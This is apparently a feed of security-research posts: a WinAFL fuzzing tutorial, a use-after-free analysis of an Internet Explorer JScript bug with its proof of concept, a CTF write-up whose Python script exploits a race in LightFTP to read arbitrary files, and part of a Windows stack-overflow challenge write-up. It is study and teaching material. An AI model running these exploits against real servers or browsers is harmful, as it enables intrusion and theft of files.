This will now conclude that article, you are now able to analyze a code-base by yourself and write your own property test and use Echidna. You can also try a promising under development fuzzer from Critic Team called Medusa.

It’s now your turn to find a target and run some fuzzing test, see if you can find bugs in the wild and happy hunting!

Reference

L’article The Art of Fuzzing – Smart Contracts est apparu en premier sur Bushido Security.

The art of fuzzing: Windows Binaries

By: shogun
25 June 2023 at 17:42

Author: 2ourc3

Introduction

Today we are gonna dive into grey-box fuzzing by testing closed source Windows binaries. This type of fuzzing allows one to fuzz a target without having access to its source code. Why doing such type of fuzzing? Since it requires more setup and advanced skills, less people are prone to look for vulnerabilities / being able to find them. Thus it enlarge the possibilities for you, vulnerability researcher, to find new undiscovered vulns.

To achieve this we will need to overcome several challenges:

  • Instrumenting the code.
  • Find a relevant function to fuzz.
  • Modifying/patching the binary to make it fuzzable.

There is plenty of solutions available to run fuzzing campaign on Windows binaries, however we gonna solely focus on WinAFL in this chapter. WinAFL offers three type of instrumentation:

  • Dynamic instrumentation via DynamoRIO – Dynamic instrumentation is modifying the instruction of a program while the program is running.
  • Static instrumentation via Syzygy – Static instrumentation is modifying the instruction of a program at compilation time.
  • Hardware Tracing via Intel PTrace – Hardware feature that asynchronously records program control flow.

While each method offer their own pros and cons, we will focus today on using Dynamic Instrumentation via DynamoRIO. See below a description of the workflow WinAFL + DynamoRIO will execute while fuzzing your target binary.

Compiling WinAFL

  1. If you are building with DynamoRIO support, download and build DynamoRIO sources or download DynamoRIO Windows binary package from https://github.com/DynamoRIO/dynamorio/releases
  2. If you are building with Intel PT support, pull third party dependencies by running git submodule update --init --recursive from the WinAFL source directory
  3. Open Visual Studio Command Prompt (or Visual Studio x64 Win64 Command Prompt if you want a 64-bit build). Note that you need a 64-bit winafl.dll build if you are fuzzing 64-bit targets and vice versa.
  4. Go to the directory containing the source
  5. Type the following commands. Modify the -DDynamoRIO_DIR flag to point to the location of your DynamoRIO cmake files (either full path or relative to the source directory).

For a 32-bit build:

mkdir build32
cd build32
cmake -G"Visual Studio 16 2019" -A Win32 .. -DDynamoRIO_DIR=..\path\to\DynamoRIO\cmake -DINTELPT=1
cmake --build . --config Release

For a 64-bit build:

mkdir build64
cd build64
cmake -G"Visual Studio 16 2019" -A x64 .. -DDynamoRIO_DIR=..\path\to\DynamoRIO\cmake -DINTELPT=1
cmake --build . --config Release

Build configuration options
The following cmake configuration options are supported:

  • -DDynamoRIO_DIR=..\path\to\DynamoRIO\cmake – Needed to build the winafl.dll DynamoRIO client
  • -DINTELPT=1 – Enable Intel PT mode. For more information see https://github.com/googleprojectzero/winafl/blob/master/readme_pt.md
  • -DUSE_COLOR=1 – color support (Windows 10 Anniversary edition or higher)
  • -DUSE_DRSYMS=1 – Drsyms support (use symbols when available to obtain -target_offset from -target_method). Enabling this has been known to cause issues on Windows 10 v1809, though there are workarounds, see #145

Find a target

Finding the right target to fuzz isn’t always easy. It’s all about finding a software complex enough to be worthy being tested but accessible enough for you to understand what to fuzz and which features is interesting.

One good strategy is to target software that are known to contains vulnerability and are reactive in a disclosure program, a good way to find such is to look on the website of Zero Day Initiative.

In this section there is previously disclosed bug which can give you a good broad view of what programs are tested and their responsiveness. Here we see that vulnerability were disclosed for Netgear and D-link product, there is tons of previously disclosed vulnerabilities on this website, up to you to search through it and find the target that interest you the most.

Since fuzzing a complex target required some advanced skills such as Reverse Engineering, understand large code-base etc, we will focus on a Binary Target i specially created for the purpose of this course. It is a vulnerable file reader, it takes a file as entry, copy its content in a buffer, and close the file.

You can download the file here, password: “bushido” https://drive.google.com/file/d/1c-cOuzYbC-gOFW91a2EHKNpZTiPrVdBP/view?usp=sharing

Patching binary to allow fuzzing

Unfortunately numerous software uses some kind of dialog box control flow where user is prompted to answer question before executing a certain task like “This file already exist. Do you want to overwrite it ?” etc.

This make the fuzzing process impossible since it will require the user to interact with dialog box, which will prevent the fuzzer to run normally. This is why we are now looking on how to improve/patch a binary in order to make it fuzzable!

Download and install Ghidra, start the application then create a project directory and project. Import vulnerable_reader.exe click on “Options..” and enable “Load Local Libraries From Disk”

After loading the libraries you can start the process of reversing by pressing enter or double click the file name, it will prompt a dialog box”Analyze” which you can configure.

For this exercise, no need to change it, however, i invite you to explore the options available and their capacities. After clicking OK you’ll see the disassembly code of the binary display, you’ll need to wait a bit that Ghidra analyzes the entire binary, you can find the progress bar at the bottom-right of the screen:

If you save your program after the analysis, you wont need to analyze it again in the future. This binary is quite small, but keep in mind it wont always been the case. I encourage you to save the analyzed program as a copy just after the analysis is performed.

Now that analysis is performed we can see through the software. Investigate this binary is gonna be quite easy since we already know one string used in the dialog box, let’s open Search > Program text then enter “You clicked Yes!” in “fields” enable “all fields” and in block enable “all blocks” then click “Search All”and double click the first finding in the results.

We can see there is two options possible, either the function allows you to select yes and close or no and close. There is no real purpose this function, however, it prevent the program to continue its flow before you click and consequently prevent you to fuzz it.

One interesting information to look at are the XREFS, which correspond at the emplacement where this function (FUN_00401000) is called. Here we can see that the function is called by FUN_00401130, let’s double click and see what this function is.

It seems that this function is basically our main function. It takes two parameters as arguments and pass it to the second function. The first function is the one responsible for the dialog box.

Let’s replace the instruction “CALL FUN_00401000” by a NOP instruction

As you can see, there is now a bunch of “??” following our instruction. It’s because the initial instruction was larger than the NOP instruction (in hex: 90) so we need to replace the “??” by NOP instructions too to respect the padding. More info https://en.wikipedia.org/wiki/Data_structure_alignment

The result must look like this:

Now export the program as PE file, click File > Export Program then select Original File and put the right path :

Let’s run the program and see if the dialog box happens again:

Bravo! Keep in mind that most programs have way more complex interactions required, and this course isn’t about Reverse Engineering. However a big aspect of running successful fuzzing campaign consist in removing what makes the fuzzer slower, and GUI is a big part of that. You should definitely have some interest in RE if you want to pursue research in fuzzing.

Function offset

WinAFL uses a technique to optimize the fuzzing process by mitigating the slow execution time associated with the exec syscall and the typical process startup procedure. Instead of re-initializing the target program for every fuzzing attempt, it employs a strategy inspired by the concept of a fork server.

The basic idea is to execute the program until reaching the desired fuzzing point by supplying randomized inputs. By employing this approach, each subprocess handles only a single input, effectively circumventing the overhead associated with the exact syscall operation.

As a result, when fuzzing a program with WinAFL, if the desired fuzzing point is reached during the third call, for example, the performance remains unaffected. However, the significant advantage lies in reducing the overhead of fuzzing throughout the entire program, leading to more efficient and effective fuzzing sessions.

Here is a diagram that illustrate this process.

How to select a target function

The target function should do these things during its lifetime:

  1. Open the input file. This needs to happen within the target function so that you can read a new input file for each iteration as the input file is rewritten between target function runs.
  2. Parse it (so that you can measure coverage of file parsing)
  3. Close the input file. This is important because if the input file is not closed WinAFL won’t be able to rewrite it.
  4. Return normally (So that WinAFL can “catch” this return and redirect execution. “returning” via ExitProcess() and such won’t work)

How to find the virtual offset of the function

  • Static analysis with tools like Ghidra and radare2
  • Debugging the code with WinDBG or x64dbg (Setting up breakpoints and analyzing the parameters of functions at runtime)
  • Use auxiliary tools like API monitors, process monitors, and coverage tools like ProcMon

Find offset via Static Analysis with Ghidra

The binary contains some strings, one of them is “Failed to open file”, let’s click the Search menu then click “Program Text” and look for this sentence:

Let’s click search all and examine the result:

Let’s double click the first occurrence in the Namespace FUN_00401060

Remember that the execution flow we are looking for is: Open file > Read it > Close the File > return to normal execution. Let’s investigate if this flow happens in the pseudo code of the function. Simplified it give us:

void __cdecl FUN_00401060(int argc, int argv)
{
  uint openResult;
  uint readResult;
  WCHAR fileContentBuffer[6]; // Buffer to store file content
  uint localVariable;

  localVariable = DAT_0041c040 ^ (uint)&stack0xfffffffc;

  if (argc < 2) {
    FUN_00401130((int)s_Usage:_%s_<filename>_0041c000); // Print usage message
  }
  else {
    openResult = FID_conflict:__open(*(char **)(argv + 4), 0x8000); // Open file specified in argv[1]
  
    if ((int)openResult < 0) {
      FUN_00401130((int)s_Failed_to_open_file:_%s_0041c018); // Print error message if file opening fails
    }
    else {
      while (readResult = FUN_00406348(openResult, fileContentBuffer, 10), 0 < (int)readResult) {
        FUN_00401130((int)&DAT_0041c034); // Print file contents
      }
      FUN_00407b70(openResult); // Close the file
    }
  }
  FUN_0040116a(localVariable ^ (uint)&stack0xfffffffc); // Some additional function call
  return;
}

Sound like a match! Now let’s find the offset of this function. It’s pretty straight forward, let’s right-click on the function and show byte. We see the address of the function is 0x00401060 and the base address is 0x0040000 so the function offset is 0x01060

Ghidra CheatSheet: https://ghidra-sre.org/CheatSheet.html

Prepare environment for fuzzing

Fuzzing binary is a quite resource-demanding tasks, here is a few things you can do to prepare your environment to run a fuzzing campaign smoothly:

  • Disabling automatic debugging
  • Disabling AV scanning

Optimization

Having a nice corpus of inputs is a very important aspect of fuzzing. WinAFL offers two options to optimize your corpus with c-min.py. Examples of use:

  • Typical use
    winafl-cmin.py -D D:\DRIO\bin32 -t 100000 -i in -o minset -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 — test.exe @@
  • Dry-run, keep crashes only with 4 workers with a working directory:
    winafl-cmin.py -C –dry-run -w 4 –working-dir D:\dir -D D:\DRIO\bin32 -t 10000 -i in -i C:\fuzz\in -o out_mini -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 — test.exe @@
  • Read from specific file
    winafl-cmin.py -D D:\DRIO\bin32 -t 100000 -i in -o minset -f foo.ext -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 — test.exe @@
  • Read from specific file with pattern
    winafl-cmin.py -D D:\DRIO\bin32 -t 100000 -i in -o minset -f prefix-@@-foo.ext -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 — test.exe @@
  • Typical use with static instrumentation
    winafl-cmin.py -Y -t 100000 -i in -o minset — test.exe @@

winafl-cmin.py can take a while to run, so be patient.

Running a campaign

We have patched the binary to make it fuzzable, found the offset of the function we want to test, now let’s have fun and run the fuzzer! WinAFL offers different options, let’s enumerate them:

  • t – Timeout per fuzzing iteration. If not completed WinAFL restart the program;
  • D – DynamoRIO path
  • coverage_module – Module(s) that records coverage.
  • target_module – Module of the target function.
  • target_offset – Virtual offset of the function to be fuzzed from the start of the module;
  • fuzz_iterations – Fuzzing iterations before restarting the exec of the program.
  • call_convention – Specifying the calling convetion: sdtcall, cdecl, and thiscall.
  • nargs – number of arguments the fuzzed function takes. The this pointer (used in the thiscall calling convention) is also considered an argument.

WARNING: We build 2 WinAFL right? Remember, use the correct version of AFL for the target you are looking to fuzz! Here we are going to use the 32 bits version!

Since our binary is meant to open and read from a text file, create a “in” folder and put a text file with a simple phrase as content.

Ok now let’s cd into WinAFL_32 build directory and run the following command:

afl-fuzz.exe -i in -o out -t 10000 -D C:\WinAFL\DynamoRIO\bin32 -- -fuzz_iterations 500 -coverage_module vulnerable_reader.exe -target_module vulnerable_reader.exe -target_offset 0x01060 -nargs 3 -call_convention thiscall -- vulnerable_reader.exe @@

If everything went well, you should see this beauty appears:

Now it’s a matter of time. Let the fuzzer run a few minutes then you should see the crash appears.

Analyze crash test

Here WinAFL found a crash really quickly. I designed on purpose a binary very simple to crash in order for this tutorial to be fun to do. As you can see, WinAFL names the crash file with the status and type of crash. You can find them in your out directory > crashes

It’s obviously a Stack BoF, since the program was purposely designed for that. However, let’s open it in WinDBG and do a root cause analysis of the crash.

Start WinDBG and click on File > Launch Executable (advanced) then put the path of the vulnerable binary as “Executable” and the crash_id file as “Arguments” then click on “Go” to run the program.

As you can see WinDBG is immediately screaming that a stack buffer overrun is detected. If you want to learn more about root cause analysis with WinDBG i suggest this nice video: https://hardik05.wordpress.com/2021/11/23/analyzing-and-finding-root-cause-of-a-vulnerability-with-time-travel-debugging-with-windbg-preview/

Exploitation

This course is not meant to teach you exploitation, however there is plenty of very good resource on this topic and i thought it was interesting to enumerate some here:

References

L’article The art of fuzzing: Windows Binaries est apparu en premier sur Bushido Security.

Reverse Engineering Terminator aka Zemana AntiMalware/AntiLogger Driver

By: voidsec
15 June 2023 at 14:25

Recently, a threat actor (TA) known as SpyBot posted a tool, on a Russian hacking forum, that can terminate any antivirus/Endpoint Detection & Response (EDR/XDR) software. IMHO, all the hype behind this announcement was utterly unjustified as it is just another instance of the well-known Bring Your Own Vulnerable Driver (BYOVD) attack technique: where a […]

The post Reverse Engineering Terminator aka Zemana AntiMalware/AntiLogger Driver appeared first on VoidSec.

ANALYSIS OF MICROSOFT IE11 SCRIPTING ENGINE MEMORY CORRUPTION VULNERABILITY (CVE-2017-11793) – Part-1

22 May 2021 at 16:58

On December 18 2017, Ivan Fratric (@ifsecure) from Google Project Zero disclosed a Use-After-Free (UAF) vulnerability in Microsoft Internet Explorer 11. A proof-of-concept (PoC) exploit can be found here on  Google Project Zero website and also on Exploit-DB. A CVE-2017-11793 was assigned to this vulnerability.

A UAF vulnerability occurs when an object is created, free-ed and then re-used or referenced again.

Though this vulnerability affects IE 11, I could reproduce it on IE 8 on Windows 7 SP1 machine. We will analyse this vulnerability in this blog.

Following is the PoC for this vulnerability:

<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">

var o1 = {toJSON:function(){
  //alert('o1');
// Object is created here return [o2]; }} var o2 = {toJSON:function(){ //alert('o2');
// Object is free-ed here CollectGarbage();

// Free-ed/Vulnerable Object is re-used/referenced here return 'x'; }} JSON.stringify(o1); </script>

Crash Analysis:

When accessed this page with debugger attached, we see following crash:

As we can see, a crash occurred because EIP is pointing to an instruction which is trying to access/dereference an invalid memory which is 0x18 bytes offset from ESI.

As we discussed earlier, a Use After Free vulnerability exists when an object is created, it is then free-ed later on and then the application tries to access that object again after it’s been free-ed.

Let’s analyse all these three steps:

Step 1: Object Creation:

After analysing memory allocations and free’s, I noticed that, the statement return [o2]; causes memory allocation. That is when the object is created. We can confirm that by carefully putting a breakpoint when the object is created and run !heap -p -a eax command:

address 0bcaefc0 found in
_DPH_HEAP_ROOT @ a11000
in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                             bc6123c:          bcaefc0               3c -          bcae000             2000
73f48e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77ef0c96 ntdll!RtlDebugAllocateHeap+0x00000030
77eaae1e ntdll!RtlpAllocateHeap+0x000000c4
77e53cce ntdll!RtlAllocateHeap+0x0000023a
76e79d45 msvcrt!malloc+0x0000008d
76e7b0d7 msvcrt!operator new+0x0000001d
6ff4cabf jscript!ArrayObj::Create+0x0000000e  
6ff8e5b3 jscript!CScriptRuntime::Run+0x0000177a
6ff55d7d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6ff55cdb jscript!ScrFncObj::Call+0x0000008d
6ff55870 jscript!NameTbl::InvokeInternal+0x000002b4
6ff54f84 jscript!VAR::InvokeByDispID+0x0000017f
6ffd2108 jscript!JSONApplyFilters+0x00000137
6ffd1c6e jscript!JSONStringifyObject+0x0000008d
6ffd1a43 jscript!JsJSONStringify+0x000003a2
6ff5599a jscript!NatFncObj::Call+0x00000106
6ff55870 jscript!NameTbl::InvokeInternal+0x000002b4

So, looking at the Call Stack during object creation (UserSize column), it’s clear that 0x3c bytes of memory was allocated at address 0x0x0bcaefc0 by calling jscript!ArrayObj::Create which in turn called msvcrt!malloc. The msvcrt!malloc then called ntdll!RtlAllocateHeap which then called ntdll!RtlpAllocateHeap. Also, it looks like jscript!ArrayObj::Create is the Constructor of this object.

Step 2: Object is free-ed

After monitoring allocations and frees for a while, I noticed that the object in question (0x0bcaefc0) is free-ed when CollectGarbage() is called. This is the same address/User Pointer (0x0x0bcaefc0) which ESI contains at the time of the crash.

We can run !heap -p -a esi command to display the allocation Call Stack for User Pointer (0x0x0bcaefc0):

0:005> !heap -p -a esi
    address 0bcaefc0 found <strong>in</strong>
    _DPH_HEAP_ROOT @ a11000
    <strong>in</strong> free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    bc6123c:          bcae000             2000
    73f490b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77ef1464 ntdll!RtlDebugFreeHeap+0x0000002f
    77eaab3a ntdll!RtlpFreeHeap+0x0000005d
    77e53472 ntdll!RtlFreeHeap+0x00000142
    76e798cd msvcrt!free+0x000000cd
    6ff67977 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x00000019
    6ff66c67 jscript!NameTbl::SetMasterVariant+0x00000054
    6ff671d8 jscript!VAR::Clear+0x0000003f
    6ff66e46 jscript!GcContext::Reclaim+0x000000b6
    6ff643e9 jscript!GcContext::CollectCore+0x00000123
    6ffc83f0 jscript!JsCollectGarbage+0x0000001d
<!-- snip --->


As we can see, the vulnerable object (0x0x0bcaefc0) is not in Busy allocation anymore but in free-ed allocation. A Destructor jscript!NativeErrorProtoObj<16>::`vector deleting destructor was called which in turn called msvcrt!free. The msvcrt!free then called ntdll!RtlFreeHeap which then called ntdll!RtlpFreeHeap and then the object was free-ed.

Step 3: Object is re-used

While continuing monitoring allocations and frees, I noticed that this free-ed/vulnerable object is referenced again right before statement return ‘x’; which triggers a Use-After-Free (UAF) bug leading to a crash:

As we can see, a crash occurred because EIP is pointing to an instruction which is trying to access/dereference an invalid memory which is 0x18 bytes offset from ESI. Following is the stack trace:

0:005> kb
ChildEBP RetAddr  Args to Child              
08b3cbac 6ffd1e46 0ba4ed10 08b3cbd8 00000000 jscript!JSONStringifyArray+0x40e
08b3cc08 6ffd1a43 08b3cc60 0ba4ed10 6ffddb00 jscript!JSONStringifyObject+0x265
08b3ccb4 6ff5599a 0ba4ed10 08b3cd58 08b3ccf8 jscript!JsJSONStringify+0x3a2
08b3cd1c 6ff55870 00000000 00000001 078b4f70 jscript!NatFncObj::Call+0x106
08b3cda0 6ff54f84 0bc9afa0 0ba4ed10 00000001 jscript!NameTbl::InvokeInternal+0x2b4
08b3cdd4 6ff5f2fb 0ba4ed10 00000000 00000001 jscript!VAR::InvokeByDispID+0x17f
08b3ce14 6ff5dcfb 0ba4ed10 08b3ce84 0bc96fc0 jscript!VAR::InvokeJSObj<SYM *>+0xb8
08b3ce50 6ff5d9a8 0ba4ed10 08b3ce84 00000001 jscript!VAR::InvokeByName+0x174

We can see that when method jscript!JsJSONStringify was called, it in turn called another method jscript!JSONStringifyObject which again called another method jscript!JSONStringifyArray. The method jscript!JSONStringifyArray then tried to access value in ESI+0x18 location and crash occurred because that memory location contains invalid data.

Now that we know when a vulnerable object is created, when it’s being free-ed and when it’s being re-used/referenced, we have enough information required to exploit this bug.

Is this bug exploitable?

In order to exploit a Use After Free vulnerability, we need to cause a series of allocations after the vulnerable object is free-ed and right before it’s re-used/referenced by the application. This way we when the application tries to reference that vulnerable object, it will see some valid data there (that we supplied) and the application won’t crash.

This means that we can now control the application flow. We could take advantage of this UAF bug to achieve remote code execution but the problem here is that these JScript allocations (including our vulnerable object) are not part of Default Process Heap. We can confirm that by looking at aforementioned Call Stack.

We can see that the address 0x0x0bcaefc0 is part of Heap Root a11000. Now if we run !heap command, we see following heaps available:

0:005> !heap
Index   Address  Name      Debugging options enabled
  1:   00810000                
  2:   001e0000                
  3:   00cd0000                
  4:   07d10000                
  5:   09590000                
  6:   09da0000                
  7:   0a530000                
  8:   09620000                
  9:   0b2c0000                
 10:   0c480000                
 11:   0c650000                
 12:   0cab0000                
 13:   0b720000  

So, here 00810000 is the Default Process Heap. If we run the !heap -p -all command, we get more information about Heap Root a11000 :

_HEAP @ 1e0000
  No FrontEnd
  _HEAP_SEGMENT @ 1e0000
   CommittedRange @ 1e0588
  * 001e0588 0048 0004  [00]   001e0590    00238 - (busy)
    001e07c8 0103 0048  [00]   001e07d0    00810 - (free)
  * 001e0fe0 0004 0103  [00]   001e0fe8    00018 - (busy)
   VirtualAllocdBlocks @ 1e00a0
_DPH_HEAP_ROOT @ a11000
Freed and decommitted blocks
  DPH_HEAP_BLOCK : VirtAddr VirtSize
    00a14e6c : 078ff000 00002000
    00a14c30 : 07915000 00002000
    00a14bfc : 07917000 00002000
    00a14b94 : 0791b000 00002000
    00a149f4 : 0792b000 00002000
    00a149c0 : 0792d000 00002000
    00a14958 : 07931000 00002000
    00a147ec : 0793f000 00002000
    00a14820 : 0793d000 00002000
    00a14854 : 0793b000 00002000
    00a146b4 : 0794b000 00002000
    00a146e8 : 07949000 00002000
<!-- snip -->

As we can see, the HEAP ROOT a11000 doesn’t belong to Default Process Heap but a different heap, 001e0000. So, if we have to replace the free-ed object (at 0x0x0bcaefc0) with the object of our choice to gain code execution, our memory allocations should be from 001e0000 and not from Default Process Heap.

If you’re interested in knowing more about causing JScript allocations, you can review this exploit from Google Project Zero: https://www.exploit-db.com/exploits/45279

If time permits, I will try to understand allocations mentioned in the aforementioned exploit and do some research about JScript allocations and see how to cause allocations from the same Heap as vulnerable object. I will post part-2 of this blog post then.

Special thanks to Peter Van Eeckhoutte (@corelanc0d3r) for amazing Advanced Windows Exploitation training & constant support.

Real World CTF 2023 – NonHeavyFTP

By: xct
8 January 2023 at 14:06

This is a short writeup on the “NonHeavyFTP” challenge from Real World CTF 2023. This was one of the easier challenges with the goal of exploiting LightFTP in Version 2.2 (the latest one on github at the time). I ended up with a file-read vulnerability that allowed to read the flag.

Vulnerability Discovery

We are given a compiled binary but there is no need to use it (unless you want to use it for local testing) since the source is on github. In addition, we get the config used on the remote system which only allows anonymous login with read-only permissions:

...
[anonymous]
pswd=*
accs=readonly
...

Unless we can somehow bypass this, we are limited to reading files (and reading the flag is enough to finish this challenge). I started to fuzz the challenge with boofuzz & the FTP fuzzing-script from its author. Unfortunately, this did not yield any results but for documentation’s sake this is how it’s setup:

# install boofuzz
mkdir boofuzz && cd boofuzz
python3 -m venv env
source env/bin/activate
pip install -U pip setuptools
pip install boofuzz

# start local version of fftp on port 2121 
./fftp

# start fuzzer
python3 fuzz.py fuzz --target-port=2121 --target-host=127.0.0.1 --username=anonymous --password=xct

This ran at about 500 exec/s on my VM but required restarting every ~32k sessions because the user limit was reached and increasing it in the config did not help. It did not find any vulnerabilities though. That leaves us with source code review to find something. Looking a bit around for dangerious functions we find a strcpy at https://github.com/hfiref0x/LightFTP/blob/master/Source/ftpserv.c#L265 :

int ftpUSER(PFTPCONTEXT context, const char *params)
{
    if ( params == NULL )
        return sendstring(context, error501);

    context->Access = FTP_ACCESS_NOT_LOGGED_IN;

    writelogentry(context, " USER: ", (char *)params);
    snprintf(context->FileName, sizeof(context->FileName), "331 User %s OK. Password required\r\n", params);
    sendstring(context, context->FileName);

    /* Suspicious strcpy */
    strcpy(context->FileName, params);
    return 1;
}

This looked interesting (e.g. send a large username to overflow the buffer) but it turned out that we can not send a buffer large enough to overflow context->FileName. If we search for other uses of context->FileName , we can see that most FTP commands are actually using this as a buffer to hold different things. At this point I was thinking we might be able to use a race condition to overwrite the contents of this buffer after a function does checks on it, for example:

int ftpLIST(PFTPCONTEXT context, const char *params)
{
   ...
    /* this function makes sure we stay inside the ftp root directory */
    ftp_effective_path(context->RootDir, context->CurrentDir, params, sizeof(context->FileName), context->FileName);

    while (stat(context->FileName, &filestats) == 0)
    {
        if ( !S_ISDIR(filestats.st_mode) )
            break;

        sendstring(context, interm150);
        writelogentry(context, " LIST", (char *)params);
        context->WorkerThreadAbort = 0;

        pthread_mutex_lock(&context->MTLock);

        context->WorkerThreadValid = pthread_create(&tid, NULL, (void * (*)(void *))list_thread, context);
        if ( context->WorkerThreadValid == 0 )
            context->WorkerThreadId = tid;
        else
            sendstring(context, error451);

        pthread_mutex_unlock(&context->MTLock);

        return 1;
    }
    return sendstring(context, error550);
}

If we could overwrite context->FileName after the ftp_effective_path function is called, it would just open the file we want even if its outside the ftp root. This buffer is assigned per connection though, so it’s not possible to overwrite it from a new connection.

There is however a different way that does not rely on a new connection. FTP can be used in passive and active mode. The way this works is, that for FTP there is a command channel and a data channel. In active mode we connect to (usually port 21) the command port and can issue whatever commands we want. If we want to get any data back, the service will connect to a port on our client-machine and send the data. In passive mode, if we connect to the service it will tell us a port on the server-side that we can connect to, to get the data. It turns out active mode is not possible here due to firewall constraints so we have to use passive mode.

If we issue a command in passive mode, like the LIST command in the example above, it will try to send the listing data to the port that was defined when we made the connection. As long as we do not connect there it can however not send the data.

This is the way it sends (after we connect) it via the stor_thread function:

void *stor_thread(PFTPCONTEXT context)
{
       ...

        f = open(context->FileName, O_CREAT | O_RDWR | O_TRUNC, S_IRWXU | S_IRGRP | S_IROTH);
        context->File = f;
        if (f == -1)
            break;

        ...
    return NULL;
}

This function is run as a new thread and is also using context->FileName! This means that we can do the following:

  • Issue LIST command with some random path, it will get stored in context->FileName. The thread starts but blocks since no connection has been made. As soon as it unblocks it will read context->FileName.
  • Issue USER command with a crafted username (directory name that we want to list), this will also get stored in context->FileName. Since the thread is still blocked that wants to send the result, we just overwrite the path after the checks were done!
  • Connect to the FTP data port to allow it to send the data

Exploitation

The flag has a random filename so we start by using our vulnerability to list the contents of the root directory:

from pwn import *
import binascii
context.terminal = ['alacritty', '-e', 'zsh', '-c']

RHOST = b"47.89.253.219"

def init():
    p.recvuntil(b"220")
    p.sendline(b"USER anonymous")
    p.recvuntil(b"331")
    p.sendline(b"PASS root")
    p.recvuntil(b"230")
    p.sendline(b"PASV")
    p.recvline()
    result = p.recvline().rstrip(b"\r\b")
    parts = [int(s) for s in re.findall(r'\b\d+\b', result.decode())]
    port = parts[-2]*256+parts[-1]
    return port

def read(port):
    p = remote(RHOST, port, level='debug')
    print(p.recvall(timeout=2))
    p.close()

# list dir
p = remote(RHOST, 2121, level='debug')
p.newline = b'\r\n'
port =init()
p.sendline(b"LIST ")  # send LIST command, wants to send us result via data port
p.sendline(b"USER /") # send USER command to overwrite dirname used by LIST
p.recvline()
read(port)
p.recvline()
p.recvline()
p.close()

Running this exploit lists the root directory and yields us the flag name. With the same technique we can now retrieve the flag file (or any file on the system):

...
p = remote(RHOST, 2121, level='debug')
p.newline = b'\r\n'
port =init()

p.sendline(b"RETR hello.txt")
p.sendline(b"USER /flag.deb10154-8cb2-11ed-be49-0242ac110002")
p.recvline()
read(port)
p.recvline()
p.recvline()
p.close()

That’s it for this challenge :)

The post Real World CTF 2023 – NonHeavyFTP appeared first on Vulndev.

Windows Exploitation Challenge – Blue Frost Security 2022 (Ekoparty)

By: voidsec
1 December 2022 at 16:07

Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since having a Windows exploitation challenge, is one of a kind in CTFs, and since I’ve found the challenge interesting and very clever, I’ve decided to post about my reverse engineering and exploitation methodology. Challenge Requests Only Python solutions without external libraries will be […]

The post Windows Exploitation Challenge – Blue Frost Security 2022 (Ekoparty) appeared first on VoidSec.

Ekoparty 2022 BFS Windows Challenge

By: xct
3 November 2022 at 03:29

In this blog post, we will solve the Windows userland challenge that Blue Frost Security published for Ekoparty 2022. You can find the challenge & description here:

We analyze the bfs-eko2022.exe binary in IDA and can see that it’s binding to 0.0.0.0 on port 31415. After a client connects, it calls sub_140001160 which is checking that the first 6 bytes received are Hello\x00. If that’s the case, it will send back Hi\x00 and proceeds to call sub_140001240 where the main packet parsing is done. At the start of this function, it fills a heap buffer as seen below:

We can see 0x5050505050505050 being written followed by 0xcf58585858585858. This is repeated over the full length of the buffer (0x1000). At the beginning of the main function we can see how this buffer is allocated:

mov     r9d, 40h        ; flProtect
mov     r8d, 3000h      ; flAllocationType
mov     edx, 1000h      ; dwSize
mov     ecx, 10000000h  ; lpAddress
call    cs:VirtualAlloc

This buffer that is being filled is on the heap at 0x10000000 , read, write, and executable, and has a size of 0x1000. This shows that the initialization being done is filling the complete buffer. These initialization values are suspicious as you would normally expect a null initialization or random data. If we disassemble the bytes we get the following instructions:

0:  50                      push   eax
1:  50                      push   eax
2:  50                      push   eax
3:  50                      push   eax
4:  50                      push   eax
5:  50                      push   eax
6:  50                      push   eax
7:  50                      push   eax
8:  cf                      iret
9:  58                      pop    eax
a:  58                      pop    eax
b:  58                      pop    eax
c:  58                      pop    eax
d:  58                      pop    eax
e:  58                      pop    eax
f:  58                      pop    eax

This does not look random at all and will play a role later on. For now, let’s continue to follow the control flow of the packet parsing function. After the handshake and initialization, it receives more bytes, looking for a magic value 0x323230326F6B45 followed by the byte T which indicates the packet type. It then expects another 4 bytes that represent the packet length.

mov     rax, 323230326F6B45h
cmp     qword ptr [rsp+0F68h+buf], rax
jz      short loc_140001339
|
movzx   eax, [rsp+0F68h+var_20]
mov     [rsp+0F68h+var_38], al
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 54h ; 'T'
jz      short loc_140001366
|
movsx   eax, [rsp+0F68h+var_1F]
cmp     eax, 0F00h
jle     short loc_140001386

The packet length comparison at the end looks interesting. It’s supposed to make sure that the packet length field can not be larger than 0xf00. Before the comparison, it’s loading the value with movsx into EAX which is move with sign-extension. This means if we would send 0xffff it would get extended to 0xffffffff and be interpreted as a negative value. Since the last jump has to be taken and -1 is lower than 0xf00 we pass the check and can continue!

Continuing at 140001386 another receive is called, reading network input data into the heap buffer at 0x10000000. The maximum amount of data we can provide here is 0x1000, since anything more than that would go outside the allocated memory and cause an exception. It is then calling sub_1400011B0 on this data.

This function is now taking the data from the heap and copying it onto the stack, using the length we have provided inside the packet itself! Remember that the intended maximum length is 0xf00 but we were able to provide 0xffff instead. This leads to a stack overflow. Another thing this function is doing is filtering out 0x2b and 0x33 while doing to copy operation, replacing them with null bytes on the stack (this will be important later).

After the copy function is finished it will once again check that the packet type is T from the copy of the data that is now on the stack. If that’s the case (which it is if used normally) it will echo back the data it received and exit. By using our stack overflow, we can however overwrite the T on the stack with an X which leads to a win-function:

movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 58h ; 'X'
jnz     short loc_140001474
|
mov     rcx, cs:buf
add     rcx, rax
mov     rax, rcx
mov     cs:off_14000C000, rax
lea     rcx, [rsp+0F68h+CmdLine] ; lpCmdLine
call    cs:off_14000C000

